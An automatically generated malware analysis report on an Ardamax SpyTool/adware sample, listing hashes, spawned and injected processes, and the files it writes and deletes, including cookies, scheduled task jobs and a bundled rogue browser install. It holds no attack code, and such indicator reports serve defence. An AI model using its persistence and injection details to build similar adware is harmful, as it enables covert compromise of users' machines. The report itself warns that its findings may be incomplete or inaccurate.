Skip to main content

SpyTool.Win32.Ardamax_780fc5ed47


not-a-virus:HEUR:AdWare.Win32.ConvertAd.heur (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, SpyTool, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 780fc5ed47f296c4e1b277c467eafa42

SHA1: 0a7431aeeda76cf17e302642f1a8c04ed91940b7

SHA256: 73924b8ea1cd3263d45f55622c9c4cca66cd9daebe7ce6f191cc606c0dcaa123

SSDeep: 6144:Ke34QY TM7L 2aWM2jYMXz1gNSuw2GU/3HkL75 ZPPfnE2Qyn2FEtt2NB6 sO:ZYpMWMYXz1gtw23ELF ZPPfnEUnsEWfb

Size: 309485 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2009-12-06 00:50:52

Analyzed on: WindowsXP SP3 32-bit

Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The SpyTool creates the following process(es):

upgmsd_re_005010096.exe:1928
gmsd_re_005010096.exe:740
nsk15.tmp:1340
nsj35.tmp:588
8819.exe:368
nssF.tmp:1488
setup.exe:828
taskkill.exe:1408
taskkill.exe:248
taskkill.exe:1092
wmic.exe:1336
amisid.exe:496
amisid.exe:600
tasklist.exe:1852
tasklist.exe:492
nsr18.tmp:1388
nsr18.tmp:460
nsx27.tmp:1340
nsx27.tmp:336
encrypt.exe:1700
encrypt.exe:1364
encrypt.exe:1564
encrypt.exe:496
%original file name%.exe:860
nsd41.tmp:816
nsk6.tmp:496
nsqA.tmp:508

The SpyTool injects its code into the following process(es):

nsk3C.tmp:192
nsb2E.tmp:908
nsp45.tmp:596
nsr21.tmp:908

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process upgmsd_re_005010096.exe:1928 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)

The process nsk3C.tmp:192 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer2.zip (392 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp (0 bytes)

The process gmsd_re_005010096.exe:740 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)

The process nsk15.tmp:1340 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr18.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (20 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (0 bytes)

The process nsj35.tmp:588 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (0 bytes)

The process nsb2E.tmp:908 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh33.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (108018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (1557 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (4183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup[1].exe (28320 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (0 bytes)

The process 8819.exe:368 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\search.ico (1917 bytes)
%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\youtube.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\groupom.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\chrome.packed.7z (1342431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)

The SpyTool deletes the following file(s):

%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (0 bytes)

The process nssF.tmp:1488 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\8819.exe (14988 bytes)

The process setup.exe:828 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
